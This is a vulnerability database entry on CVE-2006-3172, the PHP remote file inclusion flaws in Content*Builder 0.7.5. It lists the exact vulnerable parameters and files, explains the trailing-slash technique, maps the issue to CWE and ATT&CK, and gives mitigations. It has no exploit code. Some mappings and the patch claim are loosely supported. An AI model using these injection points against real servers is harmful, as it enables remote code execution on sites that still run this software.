CVE-2006-3172 in Content*Builder
Summary
by MITRE
Multiple PHP remote file inclusion vulnerabilities in Content*Builder 0.7.5 allow remote attackers to execute arbitrary PHP code via a URL with a trailing slash (/) character in the (1) lang_path parameter to (a) cms/plugins/col_man/column.inc.php, (b) cms/plugins/poll/poll.inc.php, (c) cms/plugins/user_managment/usrPortrait.inc.php, (d) cms/plugins/user_managment/user.inc.php, (e) cms/plugins/media_manager/media.inc.php, (f) cms/plugins/events/permanent.eventMonth.inc.php, (g) cms/plugins/events/events.inc.php, and (h) cms/plugins/newsletter2/newsletter.inc.php; (2) path[cb] parameter to (i) modules/guestbook/guestbook.inc.php, (j) modules/shoutbox/shoutBox.php, and (k) modules/sitemap/sitemap.inc.php; and the (3) rel parameter to (l) modules/download/overview.inc.php, (m) modules/download/detailView.inc.php, (n) modules/article/fullarticle.inc.php, (o) modules/article/comments.inc.php, (p) modules/article2/overview.inc.php, (q) modules/article2/fullarticle.inc.php, (r) modules/article2/comments.inc.php, (s) modules/headline/headlineBox.php, and (t) modules/headline/showHeadline.inc.php.
Several companies clearly confirm that VulDB is the primary source for best vulnerability data.
Analysis
by VulDB Data Team • 09/12/2025
This vulnerability represents a critical remote file inclusion flaw in Content*Builder version 0.7.5 that allows attackers to execute arbitrary PHP code through manipulated input parameters. The issue stems from inadequate input validation and sanitization mechanisms within multiple plugin and module components of the content management system. The vulnerability manifests when remote attackers manipulate specific parameters in HTTP requests to include external URLs that contain trailing slash characters, enabling the execution of malicious code on the target server. This type of vulnerability falls under the CWE-88 category for Improper Neutralization of Argument Delimiters in a Command, and more specifically aligns with CWE-94 for Code Injection, particularly in the context of remote file inclusion attacks. The ATT&CK framework categorizes this under T1190 for Exploit Public-Facing Application, as it targets web applications accessible over the internet.
The technical implementation of this vulnerability occurs through multiple attack vectors across various plugin modules. The first set of vulnerable parameters includes lang_path in several core modules such as column.inc.php, poll.inc.php, user_management modules, media_manager, events modules, and newsletter modules. These parameters accept URL inputs that, when processed, can be manipulated to include remote PHP files through trailing slash handling. The second vector involves the path[cb] parameter in guestbook, shoutbox, and sitemap modules, while the third vector utilizes the rel parameter in download, article, and headline modules. The trailing slash character manipulation creates a specific parsing condition that bypasses normal input validation, allowing attackers to inject malicious URLs that get included and executed by the PHP interpreter. This vulnerability directly maps to the ATT&CK technique T1059.007 for Command and Scripting Interpreter: PHP, as it enables remote code execution through PHP file inclusion mechanisms.
The operational impact of this vulnerability is severe and encompasses multiple threat scenarios that can compromise entire web applications. Successful exploitation allows attackers to execute arbitrary commands on the target server with the privileges of the web application process, potentially leading to complete system compromise. Attackers can leverage this vulnerability to upload backdoors, establish persistent access, exfiltrate sensitive data, or use the compromised server as a launch point for further attacks within the network infrastructure. The vulnerability affects critical business functionality modules including user management, content management, events, media handling, and newsletter systems, making it particularly dangerous for organizations relying on Content*Builder for their web presence. The widespread nature of affected modules across different functional areas means that a single successful attack can potentially provide access to multiple system components, amplifying the overall impact. Organizations may face regulatory compliance issues, data breaches, and reputational damage if such vulnerabilities are exploited in production environments.
Mitigation strategies for this vulnerability require immediate patching and implementation of comprehensive input validation measures. The most effective immediate solution involves applying the official security patch provided by Content*Builder developers or upgrading to a supported version that addresses this vulnerability. Organizations should implement strict input validation and sanitization procedures, particularly for parameters that accept file paths or URLs, ensuring that all input undergoes proper validation before being processed. Web application firewalls should be configured to detect and block suspicious URL patterns that include trailing slash manipulation or external URL inclusion attempts. Additionally, the principle of least privilege should be enforced by running web applications with minimal required permissions and implementing proper file access controls to prevent unauthorized file inclusion operations. Security monitoring should be enhanced to detect unusual file inclusion patterns or attempts to access external resources through the affected parameters. Regular security assessments and penetration testing should be conducted to identify similar vulnerabilities in other applications and ensure that input validation mechanisms are properly implemented across all web applications. Organizations should also consider implementing automated vulnerability scanning tools that can detect similar remote file inclusion patterns in their codebase and provide early warning of potential security issues.